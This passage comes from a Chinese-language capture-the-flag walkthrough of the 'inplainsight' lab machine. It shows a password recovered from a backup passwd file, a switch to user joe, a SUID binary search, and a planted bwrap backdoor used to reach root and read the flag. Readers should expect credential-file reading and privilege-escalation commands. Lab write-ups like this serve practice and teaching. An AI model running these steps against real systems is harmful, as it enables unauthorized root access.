systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:112:120::/var/spool/postfix:/usr/sbin/nologin
ftp:x:113:122:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
joe:x:1001:1001:hyphens rule:/home/joe:/bin/bash

没有发现joe用户的密码,继续遍历passwd-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
mike@inplainsight:/etc$ cat passwd-
cat passwd-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike,,,:/home/mike:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:112:120::/var/spool/postfix:/usr/sbin/nologin
ftp:x:113:122:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
joe:x:1001:1001:joe:SmashMouthNoThanks:/home/joe:/bin/bash

得到用户密码:joe/SmashMouthNoThanks,然后切换到joe用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
mike@inplainsight:/etc$ su joe
su joe
Password: SmashMouthNoThanks

joe@inplainsight:/etc$ id
id
uid=1001(joe) gid=1001(joe) groups=1001(joe)
joe@inplainsight:/etc$ whoami
whoami
joe
joe@inplainsight:/$ cd /home
cd /home
joe@inplainsight:/home$ ls
ls
joe  mike
joe@inplainsight:/home$ cd joe
cd joe
joe@inplainsight:~$ ls  
ls
journal
joe@inplainsight:~$ cat journal
cat journal
glad i added that root backdoor before boss person removed my privileges :)

意思是,系统中已经有别人先添加好的后门了,要做的唯一一件事就是获取目标的最后一个flag。为了得到它,我们使用命令find查找SUID。

1
find / -perm -u=s -type f 2>/dev/null

在执行此命令之前,我们将目录更改为“/”,并在运行该命令后找到以下有用的二进制文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
joe@inplainsight:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/bwrap
/usr/bin/mount
/usr/bin/at
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine

在/bwrap中,找到了最后一个flag,如下图:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
joe@inplainsight:~$ bwrap
bwrap
root@inplainsight:~# id
id
uid=0(root) gid=0(root) groups=0(root),1001(joe)
root@inplainsight:~# whoami
whoami
root
root@inplainsight:~# cd /root
cd /root
root@inplainsight:/root# ls
ls
flag.txt
root@inplainsight:/root# cat flag.txt
cat flag.txt

                                          __          
  ____  ____   ____    ________________ _/  |_  ______
_/ ___\/  _ \ /    \  / ___\_  __ \__  \\   __\/  ___/
\  \__(  <_> )   |  \/ /_/  >  | \// __ \|  |  \___ \ 
 \___  >____/|___|  /\___  /|__|  (____  /__| /____  >
     \/           \//_____/            \/          \/ 

easy right? thanks for playing.

feel free to leave feedback with me @bzyo_

成功提权,帅的一批。。。

  • 知识点:wordpress文件上传

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…